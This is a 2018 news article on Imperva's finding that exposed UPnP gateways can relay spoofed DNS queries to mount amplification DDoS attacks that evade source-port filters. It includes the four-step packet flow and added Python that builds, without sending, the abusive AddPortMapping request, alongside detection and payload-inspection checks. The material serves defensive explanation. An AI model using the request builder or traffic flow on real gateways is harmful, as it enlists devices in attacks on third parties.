New DDoS Attack Using UPnP Bypasses Current Defenses

May.21.2018

Author :Justin Brunnette

Category: IT News

 
There has been a rise in DDoS attacks that rely on amplification vectors: servers and databases exposed on the public internet are abused to magnify a small amount of traffic sent to them into a much larger volume of traffic aimed at a victim, turning the exposed hosts into the engine of a DDoS attack.
 
In March of this year, GitHub was the target of the largest DDoS attack seen to that date. Attackers used a memcached amplification method to sustain roughly 1.3 terabits per second of traffic for over eight minutes. Though memcached amplification has since been largely mitigated, researchers at Imperva found that UPnP can be abused to bypass the current defense methods.
 
Generating traffic of that volume would normally require a correspondingly large botnet, but amplification vectors give attackers a shortcut: a small spoofed query elicits a much larger response that is delivered to the victim. Such assaults have mostly been remedied because the amplified payloads follow predictable patterns, which makes them easy to filter. Co-authors of the report Avishay Zawoznik, Johnathan Azaria and Igal Zeifman wrote, “For example, blocking all packets with source port 53 is considered a tried-and-true method for mitigating DNS amplification attacks.”
 
But in April the researchers spotted an unusual SSDP amplification attack whose packets did not come from the source port they were expecting, UDP port 1900. SSDP (Simple Service Discovery Protocol) is the discovery protocol UPnP devices use; it runs over UDP (User Datagram Protocol) port 1900, which is why a source-port filter on 1900 normally catches SSDP amplification traffic.
 
The Imperva report lays out a proof of concept that starts by locating exposed UPnP gateway devices with the Shodan search engine and retrieving each device's description file, rootDesc.xml. The report states, “Cataloged in rootDesc.xml are all of the available UPnP services and devices.”
 
Once a reachable device is found, rootDesc.xml lists the SOAP actions the device accepts over the network. The “AddPortMapping” action, for example, creates port-forwarding rules on the gateway. The attack relies on devices that accept an arbitrary internet address as the “internal client” of such a rule, something a correctly implemented gateway should reject, since that turns the gateway into a relay to the outside rather than a forwarder into its own LAN.
 
The report stated, “Using the scheme within the file, a SOAP request can be crafted to create a forwarding rule that reroutes all UDP packets sent to port 1337 to an external DNS server (3.3.3.3) via port UDP/53.”
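As an added example (not code from the Imperva report or from this article), the Python below walks a constructed rootDesc.xml to find the WANIPConnection control URL, builds the AddPortMapping request for the rule quoted above without sending it anywhere, and then parses that same request the way a gateway-side or network-side check could, flagging any mapping whose internal client is not a LAN address. The sample XML, the control URL /ctl/IPConn and the 2.2.2.2 / 3.3.3.3 addresses are illustrative assumptions.

```python
"""Construct (without sending) the UPnP IGD AddPortMapping request the report
describes, starting from a gateway's rootDesc.xml, and flag the abuse pattern.

Added example; not code from the Imperva report or this article.
SAMPLE_ROOTDESC is a constructed, minimal rootDesc.xml; the control URL
/ctl/IPConn and the 2.2.2.2 / 3.3.3.3 addresses are illustrative."""
import ipaddress
import xml.etree.ElementTree as ET
from typing import Dict, Optional

DEVICE_NS = "urn:schemas-upnp-org:device-1-0"
WANIP_SVC = "urn:schemas-upnp-org:service:WANIPConnection:1"
SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"

# Constructed sample of what a gateway serves as rootDesc.xml, trimmed to the
# part that matters here: the WANIPConnection service and its controlURL.
SAMPLE_ROOTDESC = """<?xml version="1.0"?>
<root xmlns="urn:schemas-upnp-org:device-1-0">
  <device>
    <deviceType>urn:schemas-upnp-org:device:InternetGatewayDevice:1</deviceType>
    <friendlyName>Example IGD</friendlyName>
    <deviceList><device>
      <deviceType>urn:schemas-upnp-org:device:WANDevice:1</deviceType>
      <deviceList><device>
        <deviceType>urn:schemas-upnp-org:device:WANConnectionDevice:1</deviceType>
        <serviceList><service>
          <serviceType>urn:schemas-upnp-org:service:WANIPConnection:1</serviceType>
          <controlURL>/ctl/IPConn</controlURL>
        </service></serviceList>
      </device></deviceList>
    </device></deviceList>
  </device>
</root>"""


def find_control_url(rootdesc_xml: str) -> Optional[str]:
    """Walk rootDesc.xml and return the WANIPConnection controlURL (None if absent)."""
    root = ET.fromstring(rootdesc_xml)
    for svc in root.iter(f"{{{DEVICE_NS}}}service"):
        if svc.findtext(f"{{{DEVICE_NS}}}serviceType") == WANIP_SVC:
            return svc.findtext(f"{{{DEVICE_NS}}}controlURL")
    return None


def build_add_port_mapping(host: str, control_url: str, ext_port: int,
                           proto: str, internal_client: str,
                           internal_port: int) -> str:
    """Return the raw HTTP POST (headers plus SOAP body) for AddPortMapping.

    An empty NewRemoteHost means "accept from any source", which is what lets
    the attacker's spoofed packets reach the mapping."""
    body = (
        '<?xml version="1.0"?>\n'
        f'<s:Envelope xmlns:s="{SOAP_NS}" '
        's:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">\n'
        f'<s:Body><u:AddPortMapping xmlns:u="{WANIP_SVC}">\n'
        '<NewRemoteHost></NewRemoteHost>\n'
        f'<NewExternalPort>{ext_port}</NewExternalPort>\n'
        f'<NewProtocol>{proto}</NewProtocol>\n'
        f'<NewInternalPort>{internal_port}</NewInternalPort>\n'
        f'<NewInternalClient>{internal_client}</NewInternalClient>\n'
        '<NewEnabled>1</NewEnabled>\n'
        '<NewPortMappingDescription>x</NewPortMappingDescription>\n'
        '<NewLeaseDuration>0</NewLeaseDuration>\n'
        '</u:AddPortMapping></s:Body></s:Envelope>\n'
    )
    headers = (
        f"POST {control_url} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        'Content-Type: text/xml; charset="utf-8"\r\n'
        f'SOAPAction: "{WANIP_SVC}#AddPortMapping"\r\n'
        f"Content-Length: {len(body.encode())}\r\n\r\n"
    )
    return headers + body


def extract_mapping_args(raw_request: str) -> Dict[str, str]:
    """Pull the AddPortMapping arguments back out of a captured SOAP request.
    Returns {} for anything that is not an AddPortMapping call."""
    _, _, body = raw_request.partition("\r\n\r\n")
    try:
        env = ET.fromstring(body)
    except ET.ParseError:
        return {}
    action = env.find(f".//{{{WANIP_SVC}}}AddPortMapping")
    if action is None:
        return {}
    return {child.tag: (child.text or "") for child in action}


def is_proxy_abuse(args: Dict[str, str]) -> bool:
    """True when NewInternalClient is not a LAN address: the mapping then relays
    traffic back out to the internet (here, to a DNS server on UDP/53) instead
    of into the LAN, which is the pattern the report describes."""
    try:
        client = ipaddress.ip_address(args.get("NewInternalClient", ""))
    except ValueError:
        return False
    return not (client.is_private or client.is_loopback or client.is_link_local)


if __name__ == "__main__":
    url = find_control_url(SAMPLE_ROOTDESC)
    req = build_add_port_mapping("2.2.2.2", url, 1337, "UDP", "3.3.3.3", 53)
    print(req)
    print("proxy abuse:", is_proxy_abuse(extract_mapping_args(req)))
```

The same extract-and-flag pair works on a gateway's existing rules: enumerate them with GetGenericPortMappingEntry and feed each entry's NewInternalClient to is_proxy_abuse; any hit is a rule that forwards the device's WAN traffic to a host outside its own network.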
 
(1) Attacker 1.1.1.1, source port 80 ---> UPnP device 2.2.2.2, destination port 1337
(2) UPnP device 2.2.2.2, source port 1337 ---> DNS server 3.3.3.3, destination port 53
(3) DNS server 3.3.3.3, source port 53 ---> UPnP device 2.2.2.2, destination port 1337
(4) UPnP device 2.2.2.2, source port 1337 ---> Victim 4.4.4.4, destination port 80
 
In step (1) the attacker sends a DNS query to UDP/1337 on the UPnP device with the victim's address 4.4.4.4 forged as the source, as in any amplification attack. The forwarding rule rewrites the packet and relays it to the DNS server on UDP/53 (2). The DNS server's response, many times the size of the query, comes back to the device (3), which forwards it to the victim (4). What the victim receives carries source address 2.2.2.2 and source port 1337 rather than 3.3.3.3 and port 53, so the amplified traffic no longer looks like DNS at the IP and UDP headers.
 
This proof of concept shows that source IP and source port are no longer reliable filters for blocking amplification traffic. The report suggests that “[t]he most likely answer is to perform deep packet inspection to identify amplification payloads—a more resource-intensive process, which is challenging to perform at an inline rate without access to dedicated mitigation equipment.”
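To make the report's point concrete, the following added example (not code from the report or from this article) constructs one oversized DNS response and wraps it in two UDP packets: one arriving straight from a DNS server with source port 53, the other relayed through the UPnP device with source port 1337. A source-port rule catches only the first; a payload check that parses the DNS header regardless of port catches both. The packet contents, addresses and the 10x amplification threshold are constructed assumptions.

```python
"""Source-port filtering versus payload inspection for DNS amplification.

Added example, not code from the Imperva report or this article. The DNS
response, the packets and the 10x threshold below are constructed."""
import struct
from typing import NamedTuple, Optional


class Packet(NamedTuple):
    """Just the fields of a UDP datagram that the two filters look at."""
    src_ip: str
    src_port: int
    dst_port: int
    payload: bytes


def build_dns_response(name: str, qtype: int, n_answers: int) -> bytes:
    """Constructed sample: a DNS response padded with n_answers A records,
    the shape of an amplified reply to an ANY query."""
    qname = b"".join(bytes([len(lbl)]) + lbl.encode() for lbl in name.split(".")) + b"\x00"
    header = struct.pack("!6H", 0x1337, 0x8180, 1, n_answers, 0, 0)  # QR=1, RD, RA
    question = qname + struct.pack("!HH", qtype, 1)                   # class IN
    # Each answer: name pointer to offset 12, type A, class IN, TTL, rdlength 4, rdata.
    answer = struct.pack("!HHHIH", 0xC00C, 1, 1, 300, 4) + bytes([10, 0, 0, 1])
    return header + question + answer * n_answers


def parse_dns_response(payload: bytes) -> Optional[dict]:
    """Parse a UDP payload as a DNS response, whatever port it arrived on.

    Returns None if it is not a plausible DNS response; otherwise the query
    name, type, answer count and the response-to-query size ratio, using the
    header plus question section as the size of the query that elicited it."""
    if len(payload) < 12:
        return None
    _tid, flags, qdcount, ancount, _ns, _ar = struct.unpack("!6H", payload[:12])
    if not (flags & 0x8000) or qdcount != 1:   # QR clear: a query, not a response
        return None
    off, labels = 12, []
    while True:                                # walk the question name
        if off >= len(payload):
            return None
        length = payload[off]
        if length == 0:
            off += 1
            break
        if length & 0xC0:                      # compression pointer is illegal here
            return None
        labels.append(payload[off + 1:off + 1 + length].decode("ascii", "replace"))
        off += 1 + length
    if off + 4 > len(payload):
        return None
    qtype, _qclass = struct.unpack("!HH", payload[off:off + 4])
    query_len = off + 4
    return {"qname": ".".join(labels), "qtype": qtype, "ancount": ancount,
            "amp_factor": len(payload) / query_len}


def port_filter_hit(pkt: Packet) -> bool:
    """The tried-and-true rule: drop anything with source port 53."""
    return pkt.src_port == 53


def payload_filter_hit(pkt: Packet, min_factor: float = 10.0) -> bool:
    """Deep packet inspection: flag any DNS response whose size is at least
    min_factor times the query that produced it, regardless of port."""
    info = parse_dns_response(pkt.payload)
    return info is not None and info["amp_factor"] >= min_factor


# Constructed traffic: the same amplified reply arriving two ways.
AMPLIFIED_REPLY = build_dns_response("example.com", 255, 40)   # 255 = ANY
DIRECT = Packet("3.3.3.3", 53, 4000, AMPLIFIED_REPLY)          # straight from DNS
VIA_UPNP = Packet("2.2.2.2", 1337, 80, AMPLIFIED_REPLY)        # relayed by the gateway

if __name__ == "__main__":
    for label, pkt in (("direct", DIRECT), ("via UPnP", VIA_UPNP)):
        print(f"{label:9s} port filter: {port_filter_hit(pkt)!s:5s} "
              f"payload filter: {payload_filter_hit(pkt)}")
```

The cost difference is the report's point: port_filter_hit reads two bytes of the UDP header, while payload_filter_hit has to walk the DNS question section of every datagram, which is what makes inline inspection expensive at attack volumes.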
 
At the moment there is no clear-cut approach to defending against these attacks, which leaves networks that expose UPnP-enabled IoT devices at risk, both as targets and as unwitting relays. On the device side, the obvious hygiene step is not to expose UPnP control interfaces to the internet at all. The hope is that spreading news of this technique helps operators watch for such attacks and reaches those who may be able to find a solution.

Original Article: https://www.imperva.com/blog/2018/05/new-ddos-attack-method-demands-a-fresh-approach-to-amplification-assault-mitigation/